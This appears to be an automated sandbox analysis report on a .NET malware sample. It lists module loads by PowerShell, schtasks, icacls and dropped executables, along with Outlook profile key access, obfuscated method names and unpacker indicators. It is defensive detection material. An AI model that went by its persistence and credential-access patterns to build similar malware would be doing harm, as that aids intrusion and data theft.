Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vssfbkdOErXuYi.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vssfbkdOErXuYi.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vssfbkdOErXuYi.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vssfbkdOErXuYi.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vssfbkdOErXuYi.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vssfbkdOErXuYi.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vssfbkdOErXuYi.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vssfbkdOErXuYi.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vssfbkdOErXuYi.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vssfbkdOErXuYi.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vssfbkdOErXuYi.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vssfbkdOErXuYi.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vssfbkdOErXuYi.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vssfbkdOErXuYi.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vssfbkdOErXuYi.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vssfbkdOErXuYi.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vssfbkdOErXuYi.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vssfbkdOErXuYi.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vssfbkdOErXuYi.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vssfbkdOErXuYi.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vssfbkdOErXuYi.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vssfbkdOErXuYi.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vssfbkdOErXuYi.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vssfbkdOErXuYi.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vssfbkdOErXuYi.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vssfbkdOErXuYi.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vssfbkdOErXuYi.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vssfbkdOErXuYi.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vssfbkdOErXuYi.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vssfbkdOErXuYi.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vssfbkdOErXuYi.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vssfbkdOErXuYi.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vssfbkdOErXuYi.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vssfbkdOErXuYi.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vssfbkdOErXuYi.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\icacls.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\icacls.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\icacls.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\icacls.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\icacls.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\icacls.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\icacls.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\icacls.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\icacls.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\icacls.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\icacls.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\icacls.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\icacls.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\icacls.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\icacls.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\icacls.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\icacls.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\icacls.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\icacls.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\icacls.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\icacls.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\icacls.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\icacls.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\icacls.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Program Files (x86)\HoduJxrSVhBmVKNUTBJAZymQJnYtRxfaYhrbmMonlcKUblthgGdUnFMvDVznAaaKnxFuCZ\qLmzoTzSrlQuBN.exe	Section loaded: wininet.dll
Source: C:\Program Files (x86)\HoduJxrSVhBmVKNUTBJAZymQJnYtRxfaYhrbmMonlcKUblthgGdUnFMvDVznAaaKnxFuCZ\qLmzoTzSrlQuBN.exe	Section loaded: mswsock.dll
Source: C:\Program Files (x86)\HoduJxrSVhBmVKNUTBJAZymQJnYtRxfaYhrbmMonlcKUblthgGdUnFMvDVznAaaKnxFuCZ\qLmzoTzSrlQuBN.exe	Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\HoduJxrSVhBmVKNUTBJAZymQJnYtRxfaYhrbmMonlcKUblthgGdUnFMvDVznAaaKnxFuCZ\qLmzoTzSrlQuBN.exe	Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\HoduJxrSVhBmVKNUTBJAZymQJnYtRxfaYhrbmMonlcKUblthgGdUnFMvDVznAaaKnxFuCZ\qLmzoTzSrlQuBN.exe	Section loaded: fwpuclnt.dll
Source: C:\Program Files (x86)\HoduJxrSVhBmVKNUTBJAZymQJnYtRxfaYhrbmMonlcKUblthgGdUnFMvDVznAaaKnxFuCZ\qLmzoTzSrlQuBN.exe	Section loaded: rasadhlp.dll

Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\SysWOW64\icacls.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Source: fHkdf4WB7zhMcqP.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: fHkdf4WB7zhMcqP.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: fHkdf4WB7zhMcqP.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: icacls.pdb source: RegSvcs.exe, 00000008.00000002.1895953589.0000000001328000.00000004.00000020.00020000.00000000.sdmp, qLmzoTzSrlQuBN.exe, 0000000B.00000002.4127404685.0000000001058000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: qLmzoTzSrlQuBN.exe, 0000000B.00000000.1806716769.0000000000A3E000.00000002.00000001.01000000.0000000D.sdmp, qLmzoTzSrlQuBN.exe, 00000013.00000000.1963188407.0000000000A3E000.00000002.00000001.01000000.0000000D.sdmp
Source:	Binary string: RegSvcs.pdb, source: icacls.exe, 0000000D.00000002.4129046811.00000000034AC000.00000004.10000000.00040000.00000000.sdmp, icacls.exe, 0000000D.00000002.4127000358.00000000028B0000.00000004.00000020.00020000.00000000.sdmp, qLmzoTzSrlQuBN.exe, 00000013.00000002.4128138282.0000000002A8C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000014.00000002.2188781216.0000000025BBC000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: RegSvcs.exe, 00000008.00000002.1896121941.0000000001780000.00000040.00001000.00020000.00000000.sdmp, icacls.exe, 0000000D.00000002.4128320775.0000000002E80000.00000040.00001000.00020000.00000000.sdmp, icacls.exe, 0000000D.00000003.1896001542.0000000002B27000.00000004.00000020.00020000.00000000.sdmp, icacls.exe, 0000000D.00000003.1897804046.0000000002CDA000.00000004.00000020.00020000.00000000.sdmp, icacls.exe, 0000000D.00000002.4128320775.000000000301E000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: icacls.pdbGCTL source: RegSvcs.exe, 00000008.00000002.1895953589.0000000001328000.00000004.00000020.00020000.00000000.sdmp, qLmzoTzSrlQuBN.exe, 0000000B.00000002.4127404685.0000000001058000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: RegSvcs.exe, RegSvcs.exe, 00000008.00000002.1896121941.0000000001780000.00000040.00001000.00020000.00000000.sdmp, icacls.exe, icacls.exe, 0000000D.00000002.4128320775.0000000002E80000.00000040.00001000.00020000.00000000.sdmp, icacls.exe, 0000000D.00000003.1896001542.0000000002B27000.00000004.00000020.00020000.00000000.sdmp, icacls.exe, 0000000D.00000003.1897804046.0000000002CDA000.00000004.00000020.00020000.00000000.sdmp, icacls.exe, 0000000D.00000002.4128320775.000000000301E000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: RegSvcs.pdb source: icacls.exe, 0000000D.00000002.4129046811.00000000034AC000.00000004.10000000.00040000.00000000.sdmp, icacls.exe, 0000000D.00000002.4127000358.00000000028B0000.00000004.00000020.00020000.00000000.sdmp, qLmzoTzSrlQuBN.exe, 00000013.00000002.4128138282.0000000002A8C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000014.00000002.2188781216.0000000025BBC000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: rvfz.pdb source: fHkdf4WB7zhMcqP.exe, vssfbkdOErXuYi.exe.0.dr
Source:	Binary string: rvfz.pdbSHA256 source: fHkdf4WB7zhMcqP.exe, vssfbkdOErXuYi.exe.0.dr

Data Obfuscation

.NET source code contains potential unpacker

Source: 0.2.fHkdf4WB7zhMcqP.exe.3c8d480.0.raw.unpack, oCorf3Al2NefSCs3QA.cs	.Net Code: T8RM8qnFJs System.Reflection.Assembly.Load(byte[])
Source: 0.2.fHkdf4WB7zhMcqP.exe.77e0000.2.raw.unpack, oCorf3Al2NefSCs3QA.cs	.Net Code: T8RM8qnFJs System.Reflection.Assembly.Load(byte[])

Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Code function: 0_2_04EBCAD0 push esp; retf	0_2_04EBCAD1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0040D043 push esp; iretd	8_2_0040D044
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_00407076 push ecx; ret	8_2_00407078
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_004120F7 push esi; iretd	8_2_004120F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_004138B3 push esi; iretd	8_2_004138BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0040D17C push 78EC8806h; iretd	8_2_0040D195
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0040D115 push ds; retf	8_2_0040D119
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_004031D0 push eax; ret	8_2_004031D2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0040D316 pushad ; ret	8_2_0040D317
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_00408389 push esi; iretd	8_2_0040838A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_00418392 push edi; ret	8_2_00418393
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0041AB97 push eax; iretd	8_2_0041AB9C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_00401626 push ecx; retf	8_2_00401627
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0041AFEA pushfd ; ret	8_2_0041AFFF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0041EFB9 push eax; ret	8_2_0041EFEA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0178225F pushad ; ret	8_2_017827F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017827FA pushad ; ret	8_2_017827F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017B09AD push ecx; mov dword ptr [esp], ecx	8_2_017B09B6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0178283D push eax; iretd	8_2_01782858
Source: C:\Users\user\AppData\Roaming\vssfbkdOErXuYi.exe	Code function: 9_2_02B2469B push edx; retf	9_2_02B2469E
Source: C:\Users\user\AppData\Roaming\vssfbkdOErXuYi.exe	Code function: 9_2_02B24698 push edx; retf	9_2_02B2469A
Source: C:\Users\user\AppData\Roaming\vssfbkdOErXuYi.exe	Code function: 9_2_02B2469F push edx; retf	9_2_02B246A2
Source: C:\Users\user\AppData\Roaming\vssfbkdOErXuYi.exe	Code function: 9_2_02B24658 push edx; retf	9_2_02B2465A
Source: C:\Users\user\AppData\Roaming\vssfbkdOErXuYi.exe	Code function: 9_2_02B24790 push esi; retf	9_2_02B24792
Source: C:\Users\user\AppData\Roaming\vssfbkdOErXuYi.exe	Code function: 9_2_05203927 push 8B506C79h; iretd	9_2_0520392D
Source: C:\Program Files (x86)\HoduJxrSVhBmVKNUTBJAZymQJnYtRxfaYhrbmMonlcKUblthgGdUnFMvDVznAaaKnxFuCZ\qLmzoTzSrlQuBN.exe	Code function: 11_2_042FEC36 push ds; retf	11_2_042FEC3A
Source: C:\Program Files (x86)\HoduJxrSVhBmVKNUTBJAZymQJnYtRxfaYhrbmMonlcKUblthgGdUnFMvDVznAaaKnxFuCZ\qLmzoTzSrlQuBN.exe	Code function: 11_2_04303C18 push esi; iretd	11_2_04303C19
Source: C:\Program Files (x86)\HoduJxrSVhBmVKNUTBJAZymQJnYtRxfaYhrbmMonlcKUblthgGdUnFMvDVznAaaKnxFuCZ\qLmzoTzSrlQuBN.exe	Code function: 11_2_042FEC9D push 78EC8806h; iretd	11_2_042FECB6
Source: C:\Program Files (x86)\HoduJxrSVhBmVKNUTBJAZymQJnYtRxfaYhrbmMonlcKUblthgGdUnFMvDVznAaaKnxFuCZ\qLmzoTzSrlQuBN.exe	Code function: 11_2_042FEE37 pushad ; ret	11_2_042FEE38
Source: C:\Program Files (x86)\HoduJxrSVhBmVKNUTBJAZymQJnYtRxfaYhrbmMonlcKUblthgGdUnFMvDVznAaaKnxFuCZ\qLmzoTzSrlQuBN.exe	Code function: 11_2_04309EB3 push edi; ret	11_2_04309EB4
Source: C:\Program Files (x86)\HoduJxrSVhBmVKNUTBJAZymQJnYtRxfaYhrbmMonlcKUblthgGdUnFMvDVznAaaKnxFuCZ\qLmzoTzSrlQuBN.exe	Code function: 11_2_042F9EAA push esi; iretd	11_2_042F9EAB

Source: fHkdf4WB7zhMcqP.exe	Static PE information: section name: .text entropy: 7.07214556369783
Source: vssfbkdOErXuYi.exe.0.dr	Static PE information: section name: .text entropy: 7.07214556369783

Source: 0.2.fHkdf4WB7zhMcqP.exe.3c8d480.0.raw.unpack, RmaLLYzExuPKiT82FS.cs	High entropy of concatenated method names: 'xvOWbV5UsI', 'pNtWTvjI3Z', 'NDTWx5ckky', 'ofQWdBUk4X', 'sDlWEy7yZn', 'qAsWVy2BIM', 'dptWOi8usr', 'TmyWv1uqkp', 'UvTW4U8cNf', 'v0mWycw68e'
Source: 0.2.fHkdf4WB7zhMcqP.exe.3c8d480.0.raw.unpack, d4wf5A9MkTVdZB3iBfd.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'UtYgsH4VNl', 'H5EgWK6yUg', 'bvugc1oAPe', 'lpoggkeADF', 'eqxgUdY5cK', 'kgBgwXGbb6', 'UPYgvRVYv5'
Source: 0.2.fHkdf4WB7zhMcqP.exe.3c8d480.0.raw.unpack, rfAwRg5tlZ2QnZqx6Z.cs	High entropy of concatenated method names: 'cgT1iKnDMs', 'IlJ1G66EQQ', 'nfc1e6bj4H', 'Q5XeL2iSXT', 'jSfezxy7Yk', 'tyl17ekb0P', 'rOP19EWIPv', 'C451koHsEY', 'oP51RIFDUb', 'M7Q1MopISl'
Source: 0.2.fHkdf4WB7zhMcqP.exe.3c8d480.0.raw.unpack, bevMgBNvGXuLsK3L0W.cs	High entropy of concatenated method names: 'BP1HDHhtgJ', 'eoZHLkFWjc', 'Srwq7dxNA4', 'rhMq9qjFNv', 'W0FHBM6El7', 'vPKHlJ5Uyp', 'WZPHCjxKGS', 'BufH3LqEw1', 'B0mHuge2ng', 'xDCHjRrtQM'
Source: 0.2.fHkdf4WB7zhMcqP.exe.3c8d480.0.raw.unpack, Dtj59wCCtMLqlhMnQl.cs	High entropy of concatenated method names: 'J0WKT8ywTc', 'GKnKxmHBYE', 'GqFKdwmcno', 'lIRKEQr4dD', 'FnaKV0KBEj', 'WExKOhevhK', 'cjjK5c3uqK', 'YQjKX1Wke2', 'KeIKYtFFTA', 'fKxKBWHPgL'
Source: 0.2.fHkdf4WB7zhMcqP.exe.3c8d480.0.raw.unpack, usGuR399MTyQxj0PXCL.cs	High entropy of concatenated method names: 'JSBWL6oXRv', 'BN8Wz3yQUL', 'f55c7T9HYX', 'iSVc94QUcL', 'kBXckdN0RB', 'Js1cRXFCTd', 'SDRcMZjMrd', 'ccbcJaCTFE', 'ANecisE2iL', 'AmCc6LoJbb'
Source: 0.2.fHkdf4WB7zhMcqP.exe.3c8d480.0.raw.unpack, yMtnZb2pdA1I8l49QD.cs	High entropy of concatenated method names: 'D7AZf20bEc', 'HGTZFdTVRu', 'jJtGhJm456', 'zdAGVSy01u', 'tLAGO5xqbh', 'g0xGtTP5gN', 'Ut6G5P8vX9', 'xQZGXGB4AR', 'zvxGmiW1uR', 'PqaGYQKoC4'
Source: 0.2.fHkdf4WB7zhMcqP.exe.3c8d480.0.raw.unpack, fwYt32o8W6e1sYmQcc.cs	High entropy of concatenated method names: 'VccHSc8Heo', 'TNHHaklYWd', 'ToString', 'yt1HibyuTZ', 'WDcH6hDvRL', 'aX9HG6hc41', 'JudHZsXcKK', 'YymHeEI6m6', 'fMuH1xNIQM', 'aDNHAMSwCU'
Source: 0.2.fHkdf4WB7zhMcqP.exe.3c8d480.0.raw.unpack, N7xk8D6c5GktxMsRcb.cs	High entropy of concatenated method names: 'Dispose', 'OoX9nNMfO2', 'qc7kEbMLe2', 'mE5xho0YNv', 'k2A9Lt9nTv', 'vud9zWCeyy', 'ProcessDialogKey', 'O8Ck738RwV', 'Vr6k9j6msp', 'JqEkk0q0Mx'
Source: 0.2.fHkdf4WB7zhMcqP.exe.3c8d480.0.raw.unpack, DKHQQRT9Uy0TIHiZru.cs	High entropy of concatenated method names: 'Jp163ShW3p', 'SF46unHnDT', 'uKi6jUWy3Y', 'MUW6oyLGCc', 'xX360Xb1VR', 'QPn6NPBCyQ', 'AvN6rBd3Dt', 'QcJ6D80IbV', 'QfR6n0A6Ku', 'Uh26Lblm5m'
Source: 0.2.fHkdf4WB7zhMcqP.exe.3c8d480.0.raw.unpack, iHwuKy3LKTyd5q9ICw.cs	High entropy of concatenated method names: 'BlGQYUiyPY', 'BZfQlp9aAX', 'Cq4Q3geEYo', 'zG1Qu8JWPt', 'rTYQEWXUVV', 'IMWQhMNYna', 'nmxQVMFH0n', 'xyyQOLH0H7', 'pMPQtWQn2c', 'LOmQ5cMAXr'
Source: 0.2.fHkdf4WB7zhMcqP.exe.3c8d480.0.raw.unpack, nSl3H3mLhOOMkse8aU.cs	High entropy of concatenated method names: 'TGY14UMFpf', 'kKW1ydrnZw', 'G6U18PYnWW', 'FYf1pXlvnR', 'dm71ft3A6i', 'cFF1bGbkDS', 'hRd1FRjcIu', 'UbL1T3k7fw', 'KDN1xga1J6', 'Nf612ti2NH'
Source: 0.2.fHkdf4WB7zhMcqP.exe.3c8d480.0.raw.unpack, vwX6lrd3APHw1t0EhA.cs	High entropy of concatenated method names: 'DoleJjBfPh', 'yCae6u4RxT', 'XEgeZyyvI4', 'QmZe1esEnP', 'kT1eAnwu61', 'EkSZ0UQgF2', 'K2SZN8FBKk', 'm8vZr0CPIY', 'tDMZDVrJxu', 'uJyZnlSpEc'
Source: 0.2.fHkdf4WB7zhMcqP.exe.3c8d480.0.raw.unpack, wG4PQhxfOM5vKlsZ8Y.cs	High entropy of concatenated method names: 'OMTGpmhfSf', 'cDqGbcBFqT', 'XmTGTKqdZv', 'j63GxIo8uw', 'zWWGQhysyA', 'pF0GIsAwOL', 'vUfGHeomEE', 'X8FGqElK68', 'MIVGskpywF', 'DhSGWYh7nL'
